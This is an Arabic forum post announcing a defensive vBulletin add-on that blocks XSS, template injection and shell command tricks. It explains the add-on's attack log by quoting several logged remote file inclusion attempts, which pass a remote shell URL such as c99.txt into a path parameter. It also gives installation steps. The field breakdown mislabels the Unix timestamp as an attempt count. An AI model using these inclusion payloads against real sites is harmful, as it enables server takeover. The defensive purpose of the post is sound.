منتديات رحيل لكل العرب

منتديات رحيل لكل العرب (https://r7il.com/vb/)
-   قسم تطوير المواقع ومحركات البحث والسيو Seo والووردبريس WordPress (https://r7il.com/vb/f20/)
-   -   منع اكواد التحويل لاخر عشر مواضيع او الاهدائات (https://r7il.com/vb/t2431/)

سالجان 10-03-2019 07:27 AM
منع اكواد التحويل لاخر عشر مواضيع او الاهدائات
 
منع اكواد التحويل لاخر عشر مواضيع او الاهدائات

او الاحصائيات

فقمت في تطوير ومنع html لعنواوين المواضيع وهذا للتخلص من اكواد التحويل

وضفت خيار لتفعيل منع التحويل او ايقافه
لاصحاب المنتديات التي لاترغب في تفعيل هذي الميزة فيه

كما موضح في الصورة التالية


الخيار الاول : لتشغيل حمايه المنتدي

منع استغلال xss في المنتدي والحمد لله تم تجربة بشكل ناجح

منع حقن التمبلتات اي اختراق الفورم هوم بنسبة 90%

حجب عدة مواقع تساعد على العبث في المنتديات

تطوير للدوال القديمة للتوافق معه السيرفر

منع اكثر اوامر اليونكس وحيل الحقن في الشيل

اظهار المواقع المصابة على سيرفرك ومحاولت استغلالها للدخول على موقعك :1 (79):

الخيار الثاني :
منع اكواد التحويل لاخر عشر مواضيع
والاهداءات والاحصائيات ومسح HTml الخبيث من عنواين الموضوع

تحت التجربة والتطوير
الان نأتي للقسم الاكثر اثارة للموضوع

عند دخولك مجلد sec

افتح الملف logfile_hacker.txt

ستجد اذا تعرض السيرفر او موقعك لعملية اختراق اما بالشيل او اداة سوف يتم تخزينها بالتفصيل

كود PHP:
2007-12-11, 05:50:44, 1197370244, 209.67.223.188, p=11575//codebb/lang_select?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?, libwww-perl/5.808
2007-12-11, 06:32:22, 1197372742, 203.211.135.147, t=2081//zipndownload.php?pp_path=http://www.cartographia.org/administrator/remote.txt?, libwww-perl/5.808

2007-12-11, 07:09:46, 1197374986, 211.157.108.187, p=11575//codebb/pass_code.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?, libwww-perl/5.79
2007-12-11, 09:15:08, 1197382508, 200.102.138.66, t=http://firehash-filez.110mb.com/c99.txt?, Mozilla/3.0 (compatible; Indy Library)
الان هذول ثلاث شيلات سنشرح بالتفصيل احد الاسطر

طبعا الفاصلة تفصل بين كل معلومه ومعلومة

كود PHP:
,
التاريخ والوقت

كود PHP:
2007-12-11, 05:50:44,
عدد المحاولات

كود PHP:
1197370244
ايبي الموقع المصااب

كود PHP:
209.67.223.188
الاصابة طبعا تشفرت لاغراض امنيه

كود PHP:
p=11575//codebb/lang_select
الاستغلال

كود PHP:
?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?
نوع الاداه او اصدارها بما انو شيل راح يطلع السطر المستخدم اما اذا كان برنامج
يجيب اسمه بعد يعني من وين صدر الامر اذا من متصفح يطلع اسمه

كود PHP:
libwww-perl/5.808
الان شرح التركيب

امسح جميع هاكات لها علاقه في الحمايه او منع xss

اما من ركب هاك الحمايه issw v2

عليه فقط حذف ملف البرودكت

وتركيب المحدث


شرح حذف الهاك


من لوحت تحكم المنتدي === التحكم بالمنتجات product === من جانب المراد حذفة نختار الغاء التثبيت

ومن ثم حذف توابعه

---------------------------------------------------------------------------
التركيب


نرفع مابداخل upload الى المنتدي

نعطي الترخيص 666
logfile_hacker.txt
counter.txt

الان من لوحت تحكم المنتدي قم برفع البرودكت

تم تجربت المنتج على الاصدار

3.6.8


الساعة الآن 08:30 PM

Powered by vBulletin® Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO ©2010, Crawlability, Inc. TranZ By Almuhajir

Security team